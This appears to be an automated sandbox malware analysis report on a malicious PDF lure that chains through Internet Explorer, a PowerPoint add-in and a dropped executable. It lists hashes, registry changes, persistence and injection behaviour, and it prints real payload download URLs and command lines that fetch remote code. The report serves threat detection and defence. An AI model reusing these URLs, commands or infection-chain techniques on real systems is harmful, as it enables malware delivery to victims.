General
Target

order 17052022.pdf

Filesize

30KB

Completed

17-05-2022 19:26

Task

behavioral1

Score

10/10

MD5

f7da10c601fc5c0c2caef9f4e06508ad

SHA1

b1f40f4752866c30fbd6654f4844d13ae2958946

SHA256

0bf9fd42a0dc842dfe8ad1d5fdaa3f74e5e2ff602887dcfdbc14466f51eef6e0

SHA512

999c1cf265bd24b51a75bbe6651b2c5b7637b8df6e89a5740e31b6d9e9a74bff19c5ddd8fb445d42cfbe01f26c92db0afa273480f85895a83530ed68a9a392c3

Malware Config

Extracted

Language: ps1
Deobfuscated
URLs

ps1.dropper | https://www.mediafire.com/file/ivgr6qe4jfzd1w9/14.dll/file

Signatures 18

Defense Evasion
Discovery
Persistence
  • Blocklisted process makes network request
    powershell.exe

    Reported IOCs

    flow | pid | process
    41 | 1932 | powershell.exe
    43 | 1932 | powershell.exe
    44 | 1932 | powershell.exe
  • Executes dropped EXE
    ddond.com

    Reported IOCs

    pid | process
    1288 | ddond.com
  • Loads dropped DLL
    POWERPNT.EXE

    Reported IOCs

    pid | process
    824 | POWERPNT.EXE (×2)
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Creates scheduled task(s)
    schtasks.exe

    Description

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    TTPs

    Scheduled Task

    Reported IOCs

    pid | process
    616 | schtasks.exe
  • Kills process with taskkill
    taskkill.exe, taskkill.exe, taskkill.exe

    Reported IOCs

    pid | process
    1356 | taskkill.exe
    1936 | taskkill.exe
    1916 | taskkill.exe
  • Modifies Internet Explorer Phishing Filter
    iexplore.exe

    TTPs

    Modify Registry

    Reported IOCs

    description | ioc | process
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\PhishingFilter | iexplore.exe
    Set value (data) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 406d6ebd236ad801 | iexplore.exe
  • Modifies Internet Explorer settings
    iexplore.exe, POWERPNT.EXE, ddond.com, IEXPLORE.EXE

    TTPs

    Modify Registry

    Reported IOCs

    description | ioc | process
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Toolbar | iexplore.exe
    Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | POWERPNT.EXE
    Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | POWERPNT.EXE
    Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | POWERPNT.EXE
    Set value (data) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\DownloadWindowPlacement = 2c0000000000000000000000ffffffffffffffffffffffffffffffff100100003d000000900300001d020000 | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\GPU | iexplore.exe
    Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | POWERPNT.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MINIE | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\PageSetup | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\IntelliForms | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | iexplore.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Toolbar | POWERPNT.EXE
    Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | POWERPNT.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | iexplore.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | POWERPNT.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" | POWERPNT.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main | iexplore.exe
    Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND | POWERPNT.EXE
    Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | POWERPNT.EXE
    Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | POWERPNT.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Zoom | iexplore.exe
    Set value (data) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | iexplore.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | POWERPNT.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | iexplore.exe
    Set value (int) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | POWERPNT.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | POWERPNT.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt | POWERPNT.EXE
    Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | POWERPNT.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | iexplore.exe
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" | POWERPNT.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\LowRegistry | iexplore.exe
    Set value (int) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | POWERPNT.EXE
    Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | POWERPNT.EXE
    Set value (int) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "359580438" | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main | ddond.com
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | iexplore.exe
    Set value (int) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | POWERPNT.EXE
    Set value (int) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command | POWERPNT.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | iexplore.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | iexplore.exe
    Set value (int) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" | iexplore.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | POWERPNT.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main | IEXPLORE.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | POWERPNT.EXE
    Set value (int) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{F51E02A1-D616-11EC-BA97-DE95627D9645} = "0" | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\InternetRegistry | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | iexplore.exe
  • Modifies registry class
    POWERPNT.EXE

    Reported IOCs

    description | ioc | process
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493472-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C8-5A91-11CF-8700-00AA0060263B} | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D3-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E0-5A91-11CF-8700-00AA0060263B}\TypeLib | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A60-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a" | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347D-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DC-5A91-11CF-8700-00AA0060263B}\TypeLib | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A79-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32 | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493451-5A91-11CF-8700-00AA0060263B}\TypeLib | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493490-5A91-11CF-8700-00AA0060263B}\ = "Ruler" | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E2-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5E-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493458-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149345E-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493470-5A91-11CF-8700-00AA0060263B}\ = "RGBColor" | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347C-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348C-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DF-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934EF-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149345B-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493464-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DB-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934EC-5A91-11CF-8700-00AA0060263B} | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5B-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32 | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A62-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149349C-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934CE-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F2-5A91-11CF-8700-00AA0060263B} | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A58-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A71-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib | POWERPNT.EXE
    Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149346C-5A91-11CF-8700-00AA0060263B} | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493493-5A91-11CF-8700-00AA0060263B} | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D6-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DB-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E5-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A63-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E554-4FF5-48F4-8215-5505F990966F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493453-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149349A-5A91-11CF-8700-00AA0060263B}\TypeLib | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934B9-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934CB-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DC-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A73-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A7A-F07E-4CA4-AF6F-BEF486AA4E6F}\ = "Trendlines" | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493450-5A91-11CF-8700-00AA0060263B}\ = "Collection" | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493471-5A91-11CF-8700-00AA0060263B} | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493442-5A91-11CF-8700-00AA0060263B}\ = "_Application" | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347B-5A91-11CF-8700-00AA0060263B} | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493496-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E554-4FF5-48F4-8215-5505F990966F}\TypeLib | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E555-4FF5-48F4-8215-5505F990966F} | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493465-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D0-5A91-11CF-8700-00AA0060263B}\TypeLib | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934EF-5A91-11CF-8700-00AA0060263B}\ = "CommandEffect" | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A57-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32 | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493478-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 | POWERPNT.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934CC-5A91-11CF-8700-00AA0060263B}\TypeLib | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934CF-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" | POWERPNT.EXE
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D4-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | POWERPNT.EXE
  • Modifies system certificate store
    ddond.com

    TTPs

    Install Root Certificate, Modify Registry

    Reported IOCs

    description | ioc | process
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C | ddond.com
    Set value (data) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = [certificate blob omitted] | ddond.com
  • Suspicious behavior: AddClipboardFormatListener
    POWERPNT.EXE

    Reported IOCs

    pid | process
    824 | POWERPNT.EXE
  • Suspicious behavior: EnumeratesProcesses
    taskmgr.exe, powershell.exe

    Reported IOCs

    pid | process
    1708 | taskmgr.exe (×12)
    1932 | powershell.exe
  • Suspicious behavior: GetForegroundWindowSpam
    taskmgr.exe

    Reported IOCs

    pid | process
    1708 | taskmgr.exe
  • Suspicious use of AdjustPrivilegeToken
    taskmgr.exe, taskkill.exe, taskkill.exe, taskkill.exe, powershell.exe

    Reported IOCs

    description | pid | process
    Token: SeDebugPrivilege | 1708 | taskmgr.exe
    Token: SeDebugPrivilege | 1936 | taskkill.exe
    Token: SeDebugPrivilege | 1916 | taskkill.exe
    Token: SeDebugPrivilege | 1356 | taskkill.exe
    Token: SeDebugPrivilege | 1932 | powershell.exe
  • Suspicious use of FindShellTrayWindow
    iexplore.exe, taskmgr.exe

    Reported IOCs

    pid | process
    1076 | iexplore.exe (×2)
    1708 | taskmgr.exe (×38)
  • Suspicious use of SendNotifyMessage
    taskmgr.exe

    Reported IOCs

    pid | process
    1708 | taskmgr.exe (×38)
  • Suspicious use of SetWindowsHookEx
    AcroRd32.exe, iexplore.exe, IEXPLORE.EXE

    Reported IOCs

    pid | process
    1100 | AcroRd32.exe (×4)
    1076 | iexplore.exe (×2)
    1732 | IEXPLORE.EXE (×2)
  • Suspicious use of WriteProcessMemory
    AcroRd32.exe, iexplore.exe, POWERPNT.EXE, ddond.com

    Reported IOCs

    description | pid | process | target process
    PID 1100 wrote to memory of 1076 | 1100 | AcroRd32.exe | iexplore.exe (×4)
    PID 1076 wrote to memory of 1732 | 1076 | iexplore.exe | IEXPLORE.EXE (×4)
    PID 1076 wrote to memory of 824 | 1076 | iexplore.exe | POWERPNT.EXE (×9)
    PID 824 wrote to memory of 288 | 824 | POWERPNT.EXE | splwow64.exe (×4)
    PID 824 wrote to memory of 1288 | 824 | POWERPNT.EXE | ddond.com (×4)
    PID 1288 wrote to memory of 1932 | 1288 | ddond.com | powershell.exe (×4)
    PID 1288 wrote to memory of 616 | 1288 | ddond.com | schtasks.exe (×4)
    PID 1288 wrote to memory of 1356 | 1288 | ddond.com | taskkill.exe (×4)
    PID 1288 wrote to memory of 1936 | 1288 | ddond.com | taskkill.exe (×4)
    PID 1288 wrote to memory of 1916 | 1288 | ddond.com | taskkill.exe (×4)
Processes 12
  • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\order 17052022.pdf"
    Suspicious use of SetWindowsHookEx
    Suspicious use of WriteProcessMemory
    PID:1100
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://www.mediafire.com/file/v4sy07laokbd5at/14.ppam/file
      Modifies Internet Explorer Phishing Filter
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1076
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1076 CREDAT:275457 /prefetch:2
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        PID:1732
      • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
        "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0O8D7KIM\14.ppam"
        Loads dropped DLL
        Modifies Internet Explorer settings
        Modifies registry class
        Suspicious behavior: AddClipboardFormatListener
        Suspicious use of WriteProcessMemory
        PID:824
        • C:\Windows\splwow64.exe
          C:\Windows\splwow64.exe 12288
          PID:288
        • C:\ProgramData\ddond.com
          C:\\ProgramData\\ddond.com https://taxfile.mediafire.com/file/v9m1dw47xgtetw9/14.htm/file
          Executes dropped EXE
